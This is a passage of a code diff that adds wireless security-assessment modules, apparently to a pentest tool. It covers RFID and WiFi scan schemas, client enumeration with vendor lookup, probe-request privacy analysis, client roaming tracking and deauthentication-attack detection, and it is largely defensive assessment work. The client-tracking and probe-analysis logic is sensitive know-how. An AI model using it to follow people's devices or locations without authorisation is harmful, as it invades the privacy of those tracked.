+  export const RFIDFrequency = z.enum(["125khz", "134khz", "13.56mhz", "unknown"])
+  export type RFIDFrequency = z.infer<typeof RFIDFrequency>
+
+  /**
+   * RFID/NFC protocol.
+   */
+  export const RFIDProtocol = z.enum([
+    "iso14443a",
+    "iso14443b",
+    "iso15693",
+    "iso18092",
+    "felica",
+    "em4x",
+    "hid",
+    "indala",
+    "awid",
+    "unknown",
+  ])
+  export type RFIDProtocol = z.infer<typeof RFIDProtocol>
+
+  /**
+   * RFID/NFC tag type.
+   */
+  export const RFIDTagType = z.enum([
+    "mifare-classic-1k",
+    "mifare-classic-4k",
+    "mifare-ultralight",
+    "mifare-ultralight-c",
+    "mifare-desfire",
+    "mifare-plus",
+    "ntag213",
+    "ntag215",
+    "ntag216",
+    "em4100",
+    "em4102",
+    "t5577",
+    "hid-prox",
+    "hid-iclass",
+    "indala",
+    "awid",
+    "felica",
+    "topaz",
+    "unknown",
+  ])
+  export type RFIDTagType = z.infer<typeof RFIDTagType>
+
+  /**
+   * RFID/NFC tag.
+   */
+  export const RFIDTag = z.object({
+    id: z.string(),
+    uid: z.string(),
+    type: RFIDTagType,
+    frequency: RFIDFrequency,
+    protocol: RFIDProtocol,
+    atqa: z.string().optional(),
+    sak: z.string().optional(),
+    ats: z.string().optional(),
+    sectors: z.number().optional(),
+    blocks: z.number().optional(),
+    size: z.number().optional(),
+    writable: z.boolean().default(false),
+    locked: z.boolean().default(false),
+    passwordProtected: z.boolean().default(false),
+    defaultKeys: z.boolean().optional(),
+    data: z.string().optional(),
+    manufacturer: z.string().optional(),
+    firstSeen: z.number(),
+    lastSeen: z.number(),
+  })
+  export type RFIDTag = z.infer<typeof RFIDTag>
+
+  /**
+   * RFID reader.
+   */
+  export const RFIDReader = z.object({
+    id: z.string(),
+    name: z.string(),
+    type: z.enum(["proxmark3", "acr122u", "pn532", "chameleon", "flipper", "other"]),
+    port: z.string().optional(),
+    connected: z.boolean().default(false),
+    firmware: z.string().optional(),
+    capabilities: z.array(z.string()).default([]),
+  })
+  export type RFIDReader = z.infer<typeof RFIDReader>
+
+  /**
+   * RFID scan result.
+   */
+  export const RFIDScanResult = z.object({
+    tags: z.array(RFIDTag).default([]),
+    readers: z.array(RFIDReader).default([]),
+    lfTags: z.number().default(0),
+    hfTags: z.number().default(0),
+  })
+  export type RFIDScanResult = z.infer<typeof RFIDScanResult>
+
+  // ========== Finding Types ==========
+
+  /**
+   * Finding category.
+   */
+  export const FindingCategory = z.enum([
+    "encryption",
+    "authentication",
+    "configuration",
+    "vulnerability",
+    "attack",
+    "privacy",
+    "compliance",
+    "information", // Info-level findings
+  ])
+  export type FindingCategory = z.infer<typeof FindingCategory>
+
+  /**
+   * Finding target.
+   */
+  export const FindingTarget = z.object({
+    type: z.enum(["network", "device", "client", "tag", "reader", "interface", "general"]),
+    identifier: z.string(),
+    name: z.string().optional(),
+  })
+  export type FindingTarget = z.infer<typeof FindingTarget>
+
+  /**
+   * Wireless finding.
+   */
+  export const WirelessFinding = z.object({
+    id: z.string(),
+    scanId: z.string(),
+    wirelessType: WirelessType,
+    category: FindingCategory,
+    severity: Severity,
+    title: z.string(),
+    description: z.string(),
+    target: FindingTarget,
+    vulnerability: z.string().optional(),
+    cve: z.string().optional(),
+    cvss: z.number().optional(),
+    recommendation: z.string(),
+    remediation: z.string().optional(),
+    references: z.array(z.string()).default([]),
+    evidence: z.string().optional(),
+    falsePositive: z.boolean().default(false),
+    verified: z.boolean().default(false),
+    detectedAt: z.number(),
+  })
+  export type WirelessFinding = z.infer<typeof WirelessFinding>
+
+  // ========== Scan Types ==========
+
+  /**
+   * Scan statistics.
+   */
+  export const ScanStats = z.object({
+    networksFound: z.number().default(0),
+    clientsFound: z.number().default(0),
+    bluetoothDevicesFound: z.number().default(0),
+    rfidTagsFound: z.number().default(0),
+    findingsTotal: z.number().default(0),
+    findingsBySeverity: z
+      .object({
+        critical: z.number().default(0),
+        high: z.number().default(0),
+        medium: z.number().default(0),
+        low: z.number().default(0),
+        info: z.number().default(0),
+      })
+      .default({ critical: 0, high: 0, medium: 0, low: 0, info: 0 }),
+    handshakesCaptured: z.number().default(0),
+    rogueAPsDetected: z.number().default(0),
+    duration: z.number().default(0),
+  })
+  export type ScanStats = z.infer<typeof ScanStats>
+
+  /**
+   * Scan status.
+   */
+  export const ScanStatus = z.enum(["pending", "running", "completed", "failed", "cancelled"])
+  export type ScanStatus = z.infer<typeof ScanStatus>
+
+  /**
+   * Wireless scan result.
+   */
+  export const WirelessScanResult = z.object({
+    id: z.string(),
+    profile: z.union([ProfileId, z.string()]), // Allow string for profile name
+    status: ScanStatus,
+    interfaces: z.array(WirelessInterface).default([]),
+    wifi: WiFiScanResult.default(() => ({
+      networks: [],
+      clients: [],
+      handshakes: [],
+      rogueAPs: [],
+      deauthAttacks: [],
+    })),
+    bluetooth: BluetoothScanResult.default(() => ({
+      devices: [],
+      classicDevices: 0,
+      bleDevices: 0,
+      dualDevices: 0,
+    })),
+    rfid: RFIDScanResult.default(() => ({
+      tags: [],
+      readers: [],
+      lfTags: 0,
+      hfTags: 0,
+    })),
+    findings: z.array(WirelessFinding).default([]),
+    stats: ScanStats.default(() => ({
+      networksFound: 0,
+      clientsFound: 0,
+      bluetoothDevicesFound: 0,
+      rfidTagsFound: 0,
+      findingsTotal: 0,
+      findingsBySeverity: { critical: 0, high: 0, medium: 0, low: 0, info: 0 },
+      handshakesCaptured: 0,
+      rogueAPsDetected: 0,
+      duration: 0,
+    })),
+    startTime: z.number(),
+    endTime: z.number().optional(),
+    error: z.string().optional(),
+    // Orchestrator convenience fields (flattened from nested results)
+    wirelessTypes: z.array(WirelessType).optional(),
+    networks: z.array(WiFiNetwork).optional(),
+    bluetoothDevices: z.array(BluetoothDevice).optional(),
+    rfidTags: z.array(RFIDTag).optional(),
+  })
+  export type WirelessScanResult = z.infer<typeof WirelessScanResult>
+
+  // ========== Profile Types ==========
+
+  /**
+   * Static analysis options.
+   */
+  export const ScanOptions = z.object({
+    wifi: z.boolean().default(true),
+    bluetooth: z.boolean().default(false),
+    rfid: z.boolean().default(false),
+    monitorMode: z.boolean().default(false),
+    passive: z.boolean().default(true),
+    channels: z.array(z.number()).optional(),
+    bands: z.array(WiFiBand).optional(),
+    duration: z.number().optional(),
+    interface: z.string().optional(),
+  })
+  export type ScanOptions = z.infer<typeof ScanOptions>
+
+  /**
+   * Scan profile.
+   */
+  export const ScanProfile = z.object({
+    id: ProfileId,
+    name: z.string(),
+    description: z.string(),
+    options: ScanOptions,
+    wifiChecks: z.array(z.string()).default([]),
+    bluetoothChecks: z.array(z.string()).default([]),
+    rfidChecks: z.array(z.string()).default([]),
+    // Orchestrator-specific options
+    wirelessTypes: z.array(WirelessType).optional(),
+    scanDuration: z.number().optional(),
+    wifiBands: z.array(z.string()).optional(),
+    monitorMode: z.boolean().optional(),
+    securityAnalysis: z.boolean().optional(),
+    rogueAPDetection: z.boolean().optional(),
+    clientEnumeration: z.boolean().optional(),
+    handshakeCapture: z.boolean().optional(),
+    deauthDetection: z.boolean().optional(),
+    bleEnumeration: z.boolean().optional(),
+    classicEnumeration: z.boolean().optional(),
+    cloningAssessment: z.boolean().optional(),
+  })
+  export type ScanProfile = z.infer<typeof ScanProfile>
+
+  // ========== Storage Types ==========
+
+  /**
+   * Storage configuration.
+   */
+  export const StorageConfig = z.object({
+    storage: z.enum(["file", "memory"]).optional(),
+    basePath: z.string().optional(),
+  })
+  export type StorageConfig = z.infer<typeof StorageConfig>
+
+  // ========== Baseline Types ==========
+
+  /**
+   * Network baseline for rogue AP detection.
+   */
+  export const NetworkBaseline = z.object({
+    id: z.string(),
+    name: z.string(),
+    networks: z.array(
+      z.object({
+        bssid: z.string(),
+        essid: z.string(),
+        channel: z.number(),
+        encryption: WiFiEncryption,
+      })
+    ),
+    createdAt: z.number(),
+    updatedAt: z.number(),
+  })
+  export type NetworkBaseline = z.infer<typeof NetworkBaseline>
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/wifi/clients.ts b/packages/opencode/src/pentest/wirelessscan/wifi/clients.ts
new file mode 100644
index 00000000000..21de8c2d613
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/wifi/clients.ts
@@ -0,0 +1,458 @@
+/**
+ * @fileoverview WiFi Client Enumeration
+ *
+ * Discovery and analysis of WiFi clients connected to access points.
+ *
+ * @module pentest/wirelessscan/wifi/clients
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { WirelessScanEvents } from "../events"
+
+/**
+ * WiFi clients namespace.
+ */
+export namespace WiFiClients {
+  // ========== OUI Database (Sample entries) ==========
+
+  const OUI_DATABASE: Record<string, string> = {
+    "00:00:0C": "Cisco",
+    "00:01:42": "Cisco",
+    "00:03:6B": "Cisco",
+    "00:0C:29": "VMware",
+    "00:50:56": "VMware",
+    "08:00:27": "VirtualBox",
+    "00:1A:11": "Google",
+    "3C:5A:B4": "Google",
+    "F4:F5:D8": "Google",
+    "00:17:F2": "Apple",
+    "00:1C:B3": "Apple",
+    "00:21:E9": "Apple",
+    "00:22:41": "Apple",
+    "00:23:12": "Apple",
+    "00:25:00": "Apple",
+    "00:26:08": "Apple",
+    "28:CF:DA": "Apple",
+    "3C:15:C2": "Apple",
+    "AC:DE:48": "Apple",
+    "00:1B:63": "Apple",
+    "00:24:36": "Apple",
+    "00:1A:2B": "Ayecom",
+    "00:16:EA": "Intel",
+    "00:19:D2": "Intel",
+    "00:1C:C0": "Intel",
+    "00:1E:64": "Intel",
+    "00:1F:3B": "Intel",
+    "00:21:5D": "Intel",
+    "00:22:FA": "Intel",
+    "00:24:D7": "Intel",
+    "3C:A9:F4": "Intel",
+    "28:16:AD": "Intel",
+    "00:18:DE": "Intel",
+    "00:26:C6": "Intel",
+    "00:0E:35": "Intel",
+    "00:13:02": "Intel",
+    "00:13:20": "Intel",
+    "00:50:F2": "Microsoft",
+    "00:03:FF": "Microsoft",
+    "B8:27:EB": "Raspberry Pi",
+    "DC:A6:32": "Raspberry Pi",
+    "E4:5F:01": "Raspberry Pi",
+    "00:1E:58": "D-Link",
+    "00:22:B0": "D-Link",
+    "00:24:01": "D-Link",
+    "00:26:5A": "D-Link",
+    "00:1E:8C": "ASUSTek",
+    "00:22:15": "ASUSTek",
+    "00:23:54": "ASUSTek",
+    "00:25:22": "ASUSTek",
+    "00:26:18": "ASUSTek",
+    "00:1F:C6": "ASUSTek",
+    "00:0C:6E": "ASUSTek",
+    "00:E0:18": "ASUSTek",
+    "54:04:A6": "ASUSTek",
+    "00:1D:D8": "Microsoft",
+    "00:21:6A": "Intel",
+    "98:5F:D3": "Microsoft",
+    "B4:AE:2B": "Microsoft",
+    "00:1A:A0": "Dell",
+    "00:21:9B": "Dell",
+    "00:22:19": "Dell",
+    "00:23:AE": "Dell",
+    "00:24:E8": "Dell",
+    "00:25:64": "Dell",
+    "00:26:B9": "Dell",
+    "14:FE:B5": "Dell",
+    "18:A9:9B": "Dell",
+    "34:17:EB": "Dell",
+    "00:1E:4F": "Dell",
+    "00:14:22": "Dell",
+    "00:06:5B": "Dell",
+    "00:C0:4F": "Dell",
+    "00:08:74": "Dell",
+    "F0:4D:A2": "Dell",
+    "00:16:D3": "Wistron",
+    "00:1A:6B": "Universal Global",
+    "00:1C:26": "Hon Hai",
+    "00:22:43": "AzureWave",
+    "00:18:F3": "ASUSTek",
+    "74:D0:2B": "ASUSTek",
+    "10:C3:7B": "ASUSTek",
+    "00:13:D4": "ASUSTek",
+    "00:15:F2": "ASUSTek",
+    "00:17:31": "ASUSTek",
+    "00:1A:92": "ASUSTek",
+    "00:1B:FC": "ASUSTek",
+    "00:1D:60": "ASUSTek",
+    "BC:AE:C5": "ASUSTek",
+    "00:24:8C": "ASUSTek",
+    "20:CF:30": "ASUSTek",
+    "AC:22:0B": "ASUSTek",
+    "E0:CB:4E": "ASUSTek",
+    "F4:6D:04": "ASUSTek",
+    "00:19:E0": "TP-Link",
+    "00:1D:0F": "TP-Link",
+    "00:21:27": "TP-Link",
+    "00:23:CD": "TP-Link",
+    "00:25:86": "TP-Link",
+    "00:27:19": "TP-Link",
+    "14:CC:20": "TP-Link",
+    "14:CF:92": "TP-Link",
+    "18:A6:F7": "TP-Link",
+    "1C:FA:68": "TP-Link",
+    "30:B5:C2": "TP-Link",
+    "50:FA:84": "TP-Link",
+    "54:C8:0F": "TP-Link",
+    "5C:89:9A": "TP-Link",
+    "60:E3:27": "TP-Link",
+    "64:56:01": "TP-Link",
+    "64:66:B3": "TP-Link",
+    "64:70:02": "TP-Link",
+    "6C:B0:CE": "TP-Link",
+    "74:EA:3A": "TP-Link",
+    "78:A1:06": "TP-Link",
+    "8C:21:0A": "TP-Link",
+    "90:F6:52": "TP-Link",
+    "94:0C:6D": "TP-Link",
+    "98:DE:D0": "TP-Link",
+    "A0:F3:C1": "TP-Link",
+    "AC:84:C6": "TP-Link",
+    "B0:48:7A": "TP-Link",
+    "B0:95:8E": "TP-Link",
+    "BC:46:99": "TP-Link",
+    "C0:25:E9": "TP-Link",
+    "C4:6E:1F": "TP-Link",
+    "C8:3A:35": "TP-Link",
+    "D4:6E:0E": "TP-Link",
+    "D8:07:B6": "TP-Link",
+    "E4:D3:32": "TP-Link",
+    "E8:94:F6": "TP-Link",
+    "EC:08:6B": "TP-Link",
+    "F4:EC:38": "TP-Link",
+    "F8:1A:67": "TP-Link",
+    "FC:D7:33": "TP-Link",
+    "00:24:B2": "Netgear",
+    "00:26:F2": "Netgear",
+    "20:4E:7F": "Netgear",
+    "28:C6:8E": "Netgear",
+    "30:46:9A": "Netgear",
+    "44:94:FC": "Netgear",
+    "4C:60:DE": "Netgear",
+    "84:1B:5E": "Netgear",
+    "9C:3D:CF": "Netgear",
+    "A0:21:B7": "Netgear",
+    "A0:40:A0": "Netgear",
+    "A4:2B:8C": "Netgear",
+    "B0:7F:B9": "Netgear",
+    "C0:3F:0E": "Netgear",
+    "C4:04:15": "Netgear",
+    "C4:3D:C7": "Netgear",
+    "CC:40:D0": "Netgear",
+    "E0:46:9A": "Netgear",
+    "E0:91:F5": "Netgear",
+    "E4:F4:C6": "Netgear",
+    "F8:E9:03": "Netgear",
+    "00:1E:2A": "Netgear",
+    "00:1F:33": "Netgear",
+    "00:22:3F": "Netgear",
+    "C0:FF:D4": "Netgear",
+    "8C:3B:AD": "Netgear",
+    "00:09:5B": "Netgear",
+    "00:0F:B5": "Netgear",
+    "00:14:6C": "Netgear",
+    "00:18:4D": "Netgear",
+    "00:1B:2F": "Netgear",
+    "38:94:ED": "Netgear",
+  }
+
+  // ========== Client Enumeration ==========
+
+  /**
+   * Enrich client data with vendor information.
+   */
+  export function enrichClientData(clients: WirelessScanTypes.WiFiClient[]): WirelessScanTypes.WiFiClient[] {
+    return clients.map((client) => ({
+      ...client,
+      vendor: client.vendor || lookupVendor(client.mac),
+    }))
+  }
+
+  /**
+   * Lookup vendor from MAC address OUI.
+   */
+  export function lookupVendor(mac: string): string | undefined {
+    const prefix = mac.toUpperCase().slice(0, 8)
+    return OUI_DATABASE[prefix]
+  }
+
+  /**
+   * Analyze client probes for potential privacy/security issues.
+   */
+  export interface ProbeAnalysis {
+    client: WirelessScanTypes.WiFiClient
+    probeCount: number
+    uniqueProbes: string[]
+    sensitiveProbes: string[]
+    hiddenNetworkProbes: string[]
+  }
+
+  /**
+   * Analyze client probe requests.
+   */
+  export function analyzeProbes(
+    clients: WirelessScanTypes.WiFiClient[],
+    knownNetworks: WirelessScanTypes.WiFiNetwork[]
+  ): ProbeAnalysis[] {
+    const knownEssids = new Set(knownNetworks.map((n) => n.essid))
+    const results: ProbeAnalysis[] = []
+
+    for (const client of clients) {
+      if (!client.probes.length) continue
+
+      const uniqueProbes = [...new Set(client.probes)]
+      const hiddenNetworkProbes = uniqueProbes.filter((p) => !knownEssids.has(p))
+      const sensitiveProbes = uniqueProbes.filter(isSensitiveProbe)
+
+      results.push({
+        client,
+        probeCount: client.probes.length,
+        uniqueProbes,
+        sensitiveProbes,
+        hiddenNetworkProbes,
+      })
+    }
+
+    return results
+  }
+
+  /**
+   * Check if a probe request reveals sensitive information.
+   */
+  function isSensitiveProbe(essid: string): boolean {
+    const patterns = [
+      /^[A-Za-z]+[-_]?[A-Za-z]+'?s?[-_]?(iphone|ipad|android|phone|mobile)/i,
+      /^[A-Za-z]+ (home|house|apt|apartment)/i,
+      /company|corp|office|work/i,
+      /hotel|airport|cafe|coffee/i,
+    ]
+
+    return patterns.some((p) => p.test(essid))
+  }
+
+  /**
+   * Group clients by their vendor.
+   */
+  export function groupByVendor(
+    clients: WirelessScanTypes.WiFiClient[]
+  ): Map<string, WirelessScanTypes.WiFiClient[]> {
+    const groups = new Map<string, WirelessScanTypes.WiFiClient[]>()
+
+    for (const client of clients) {
+      const vendor = client.vendor || "Unknown"
+      const existing = groups.get(vendor) || []
+      existing.push(client)
+      groups.set(vendor, existing)
+    }
+
+    return groups
+  }
+
+  /**
+   * Find unassociated clients (not connected to any AP).
+   */
+  export function findUnassociatedClients(
+    clients: WirelessScanTypes.WiFiClient[]
+  ): WirelessScanTypes.WiFiClient[] {
+    return clients.filter((c) => !c.associated || !c.bssid)
+  }
+
+  /**
+   * Find clients with active probing.
+   */
+  export function findProbingClients(
+    clients: WirelessScanTypes.WiFiClient[]
+  ): WirelessScanTypes.WiFiClient[] {
+    return clients.filter((c) => c.probes.length > 0)
+  }
+
+  // ========== Client Statistics ==========
+
+  /**
+   * Get client statistics.
+   */
+  export function getClientStats(clients: WirelessScanTypes.WiFiClient[]): {
+    total: number
+    associated: number
+    unassociated: number
+    probing: number
+    byVendor: Record<string, number>
+    averageSignal: number
+  } {
+    const associated = clients.filter((c) => c.associated).length
+    const probing = clients.filter((c) => c.probes.length > 0).length
+
+    const vendorCounts: Record<string, number> = {}
+    for (const client of clients) {
+      const vendor = client.vendor || "Unknown"
+      vendorCounts[vendor] = (vendorCounts[vendor] || 0) + 1
+    }
+
+    const signalSum = clients.reduce((sum, c) => sum + (c.signal || -100), 0)
+    const averageSignal = clients.length > 0 ? signalSum / clients.length : -100
+
+    return {
+      total: clients.length,
+      associated,
+      unassociated: clients.length - associated,
+      probing,
+      byVendor: vendorCounts,
+      averageSignal,
+    }
+  }
+
+  // ========== Client Tracking ==========
+
+  /**
+   * Track client movement between APs.
+   */
+  export interface ClientMovement {
+    client: WirelessScanTypes.WiFiClient
+    previousBssid?: string
+    currentBssid?: string
+    timestamp: number
+  }
+
+  /**
+   * Track client roaming between access points.
+   */
+  export function trackClientMovement(
+    currentClients: WirelessScanTypes.WiFiClient[],
+    previousClients: WirelessScanTypes.WiFiClient[]
+  ): ClientMovement[] {
+    const movements: ClientMovement[] = []
+    const previousMap = new Map(previousClients.map((c) => [c.mac, c]))
+
+    for (const current of currentClients) {
+      const previous = previousMap.get(current.mac)
+
+      if (previous && previous.bssid !== current.bssid) {
+        movements.push({
+          client: current,
+          previousBssid: previous.bssid,
+          currentBssid: current.bssid,
+          timestamp: Date.now(),
+        })
+      }
+    }
+
+    return movements
+  }
+
+  // ========== Event Emission ==========
+
+  /**
+   * Emit events for discovered clients.
+   */
+  export function emitClientEvents(
+    clients: WirelessScanTypes.WiFiClient[],
+    scanId: string
+  ): void {
+    for (const client of clients) {
+      Bus.publish(WirelessScanEvents.ClientFound, {
+        scanId,
+        mac: client.mac,
+        bssid: client.bssid,
+        vendor: client.vendor,
+        probes: client.probes,
+      })
+    }
+  }
+
+  // ========== Finding Generation ==========
+
+  /**
+   * Create findings from client analysis.
+   */
+  export function createFindings(
+    probeAnalysis: ProbeAnalysis[],
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding[] {
+    const findings: WirelessScanTypes.WirelessFinding[] = []
+
+    for (const analysis of probeAnalysis) {
+      // Finding for excessive probing
+      if (analysis.uniqueProbes.length > 10) {
+        findings.push({
+          id: WirelessScanStorage.createFindingId(),
+          scanId,
+          wirelessType: "wifi",
+          category: "privacy",
+          severity: "low",
+          title: "Excessive Probe Requests",
+          description: `Client ${analysis.client.mac} (${analysis.client.vendor || "Unknown"}) is broadcasting ${analysis.uniqueProbes.length} unique network probes, potentially revealing visited locations.`,
+          target: {
+            type: "client",
+            identifier: analysis.client.mac,
+            name: analysis.client.vendor,
+          },
+          recommendation:
+            "Configure devices to use randomized MAC addresses and minimize probe request broadcasting. On iOS/Android, enable 'Use Random Hardware Address' in WiFi settings.",
+          references: [
+            "https://www.eff.org/deeplinks/2014/07/your-android-device-telling-world-where-youve-been",
+          ],
+          falsePositive: false,
+          verified: false,
+          detectedAt: Date.now(),
+        })
+      }
+
+      // Finding for sensitive probes
+      if (analysis.sensitiveProbes.length > 0) {
+        findings.push({
+          id: WirelessScanStorage.createFindingId(),
+          scanId,
+          wirelessType: "wifi",
+          category: "privacy",
+          severity: "info",
+          title: "Sensitive Network Names in Probes",
+          description: `Client ${analysis.client.mac} is probing for networks with potentially sensitive names: ${analysis.sensitiveProbes.slice(0, 3).join(", ")}`,
+          target: {
+            type: "client",
+            identifier: analysis.client.mac,
+            name: analysis.client.vendor,
+          },
+          recommendation:
+            "Remove sensitive network names from the device's known networks list. Use generic names for home networks.",
+          references: [],
+          falsePositive: false,
+          verified: false,
+          detectedAt: Date.now(),
+        })
+      }
+    }
+
+    return findings
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/wifi/deauth.ts b/packages/opencode/src/pentest/wirelessscan/wifi/deauth.ts
new file mode 100644
index 00000000000..4531300347f
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/wifi/deauth.ts
@@ -0,0 +1,392 @@
+/**
+ * @fileoverview WiFi Deauthentication Detection
+ *
+ * Detection of deauthentication attacks and suspicious activity.
+ *
+ * @module pentest/wirelessscan/wifi/deauth
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { WirelessScanEvents } from "../events"
+
+/**
+ * Deauth detection namespace.
+ */
+export namespace WiFiDeauth {
+  // ========== Detection Thresholds ==========
+
+  /**
+   * Detection configuration.
+   */
+  export interface DetectionConfig {
+    /** Minimum deauths per minute to trigger alert */
+    deauthThreshold: number
+    /** Time window in milliseconds */
+    windowMs: number
+    /** Track broadcast deauths */
+    trackBroadcast: boolean
+  }
+
+  /**
+   * Default detection configuration.
+   */
+  export const DEFAULT_CONFIG: DetectionConfig = {
+    deauthThreshold: 10,
+    windowMs: 60000, // 1 minute
+    trackBroadcast: true,
+  }
+
+  // ========== Deauth Tracking ==========
+
+  /**
+   * Deauth event tracker.
+   */
+  export interface DeauthTracker {
+    attacks: WirelessScanTypes.DeauthAttack[]
+    config: DetectionConfig
+  }
+
+  /**
+   * Create a new deauth tracker.
+   */
+  export function createTracker(config: Partial<DetectionConfig> = {}): DeauthTracker {
+    return {
+      attacks: [],
+      config: { ...DEFAULT_CONFIG, ...config },
+    }
+  }
+
+  /**
+   * Record a deauth packet.
+   */
+  export function recordDeauth(
+    tracker: DeauthTracker,
+    packet: {
+      sourceMac: string
+      targetMac: string
+      bssid: string
+      reason?: number
+    },
+    scanId: string
+  ): WirelessScanTypes.DeauthAttack | null {
+    const now = Date.now()
+
+    // Find existing attack tracking this source/target/bssid combo
+    let attack = tracker.attacks.find(
+      (a) =>
+        a.sourceMac === packet.sourceMac &&
+        a.targetMac === packet.targetMac &&
+        a.bssid === packet.bssid
+    )
+
+    if (attack) {
+      attack.count++
+      attack.lastSeen = now
+    } else {
+      attack = {
+        id: WirelessScanStorage.createNetworkId(),
+        sourceMac: packet.sourceMac.toUpperCase(),
+        targetMac: packet.targetMac.toUpperCase(),
+        bssid: packet.bssid.toUpperCase(),
+        count: 1,
+        reason: packet.reason,
+        startTime: now,
+        lastSeen: now,
+      }
+      tracker.attacks.push(attack)
+    }
+
+    // Check if threshold exceeded
+    const recentCount = getRecentDeauthCount(tracker, attack, now)
+    if (recentCount >= tracker.config.deauthThreshold) {
+      emitDeauthEvent(attack, scanId)
+      return attack
+    }
+
+    return null
+  }
+
+  /**
+   * Get recent deauth count for an attack within the time window.
+   */
+  function getRecentDeauthCount(
+    tracker: DeauthTracker,
+    attack: WirelessScanTypes.DeauthAttack,
+    now: number
+  ): number {
+    const windowStart = now - tracker.config.windowMs
+
+    // Count deauths from same source in the time window
+    return tracker.attacks
+      .filter(
+        (a) =>
+          a.sourceMac === attack.sourceMac &&
+          a.bssid === attack.bssid &&
+          a.lastSeen >= windowStart
+      )
+      .reduce((sum, a) => sum + a.count, 0)
+  }
+
+  /**
+   * Clean old entries from tracker.
+   */
+  export function cleanTracker(tracker: DeauthTracker, maxAgeMs: number = 300000): void {
+    const cutoff = Date.now() - maxAgeMs
+    tracker.attacks = tracker.attacks.filter((a) => a.lastSeen >= cutoff)
+  }
+
+  // ========== Analysis ==========
+
+  /**
+   * Analyze deauth attacks for patterns.
+   */
+  export interface DeauthAnalysis {
+    totalAttacks: number
+    uniqueTargets: number
+    uniqueSources: number
+    targetedNetworks: string[]
+    isBroadcast: boolean
+    isTargeted: boolean
+    estimatedAttackType: "targeted" | "broadcast" | "mixed" | "unknown"
+    severity: WirelessScanTypes.Severity
+  }
+
+  /**
+   * Analyze deauth attack patterns.
+   */
+  export function analyzeAttacks(
+    attacks: WirelessScanTypes.DeauthAttack[]
+  ): DeauthAnalysis {
+    if (attacks.length === 0) {
+      return {
+        totalAttacks: 0,
+        uniqueTargets: 0,
+        uniqueSources: 0,
+        targetedNetworks: [],
+        isBroadcast: false,
+        isTargeted: false,
+        estimatedAttackType: "unknown",
+        severity: "info",
+      }
+    }
+
+    const uniqueTargets = new Set(attacks.map((a) => a.targetMac))
+    const uniqueSources = new Set(attacks.map((a) => a.sourceMac))
+    const targetedNetworks = [...new Set(attacks.map((a) => a.bssid))]
+
+    const broadcastMac = "FF:FF:FF:FF:FF:FF"
+    const isBroadcast = attacks.some((a) => a.targetMac === broadcastMac)
+    const isTargeted = attacks.some((a) => a.targetMac !== broadcastMac)
+
+    let estimatedAttackType: DeauthAnalysis["estimatedAttackType"]
+    if (isBroadcast && isTargeted) {
+      estimatedAttackType = "mixed"
+    } else if (isBroadcast) {
+      estimatedAttackType = "broadcast"
+    } else if (isTargeted) {
+      estimatedAttackType = "targeted"
+    } else {
+      estimatedAttackType = "unknown"
+    }
+
+    // Determine severity based on attack volume and type
+    let severity: WirelessScanTypes.Severity
+    const totalCount = attacks.reduce((sum, a) => sum + a.count, 0)
+    if (totalCount > 100 || (isBroadcast && totalCount > 50)) {
+      severity = "critical"
+    } else if (totalCount > 50 || (isTargeted && totalCount > 20)) {
+      severity = "high"
+    } else if (totalCount > 10) {
+      severity = "medium"
+    } else {
+      severity = "low"
+    }
+
+    return {
+      totalAttacks: attacks.length,
+      uniqueTargets: uniqueTargets.size,
+      uniqueSources: uniqueSources.size,
+      targetedNetworks,
+      isBroadcast,
+      isTargeted,
+      estimatedAttackType,
+      severity,
+    }
+  }
+
+  // ========== Event Emission ==========
+
+  /**
+   * Emit deauth detected event.
+   */
+  function emitDeauthEvent(
+    attack: WirelessScanTypes.DeauthAttack,
+    scanId: string
+  ): void {
+    Bus.publish(WirelessScanEvents.DeauthDetected, {
+      scanId,
+      sourceMac: attack.sourceMac,
+      targetMac: attack.targetMac,
+      bssid: attack.bssid,
+      count: attack.count,
+    })
+  }
+
+  // ========== Finding Generation ==========
+
+  /**
+   * Create findings from deauth detections.
+   */
+  export function createFindings(
+    attacks: WirelessScanTypes.DeauthAttack[],
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding[] {
+    if (attacks.length === 0) return []
+
+    const analysis = analyzeAttacks(attacks)
+    const findings: WirelessScanTypes.WirelessFinding[] = []
+
+    // Create main deauth finding
+    const totalCount = attacks.reduce((sum, a) => sum + a.count, 0)
+
+    findings.push({
+      id: WirelessScanStorage.createFindingId(),
+      scanId,
+      wirelessType: "wifi",
+      category: "attack",
+      severity: analysis.severity,
+      title: "Deauthentication Attack Detected",
+      description: getDeauthDescription(analysis, totalCount),
+      target: {
+        type: "network",
+        identifier: analysis.targetedNetworks[0] || "Multiple",
+        name: analysis.targetedNetworks.length === 1
+          ? analysis.targetedNetworks[0]
+          : `${analysis.targetedNetworks.length} networks`,
+      },
+      vulnerability: "802.11 Deauthentication Flood",
+      recommendation: getDeauthRecommendation(analysis),
+      references: [
+        "https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack",
+        "https://www.wi-fi.org/knowledge-center/faq/what-are-protected-management-frames",
+      ],
+      evidence: `${totalCount} deauth frames from ${analysis.uniqueSources} source(s) to ${analysis.uniqueTargets} target(s)`,
+      falsePositive: false,
+      verified: true,
+      detectedAt: Date.now(),
+    })
+
+    // Create individual findings for each attacker
+    const attackerMap = new Map<string, WirelessScanTypes.DeauthAttack[]>()
+    for (const attack of attacks) {
+      const existing = attackerMap.get(attack.sourceMac) || []
+      existing.push(attack)
+      attackerMap.set(attack.sourceMac, existing)
+    }
+
+    for (const [sourceMac, sourceAttacks] of attackerMap.entries()) {
+      const count = sourceAttacks.reduce((sum, a) => sum + a.count, 0)
+      if (count >= 20) {
+        findings.push({
+          id: WirelessScanStorage.createFindingId(),
+          scanId,
+          wirelessType: "wifi",
+          category: "attack",
+          severity: count > 50 ? "high" : "medium",
+          title: "Active Deauth Attacker Identified",
+          description: `Device ${sourceMac} is actively sending deauthentication frames (${count} frames detected). This device may be running attack tools like aireplay-ng, mdk3, or similar.`,
+          target: {
+            type: "client",
+            identifier: sourceMac,
+          },
+          vulnerability: "Deauthentication Attack Source",
+          recommendation: "Identify and remove the attacking device from the premises. Consider implementing MAC filtering and enabling Protected Management Frames (802.11w).",
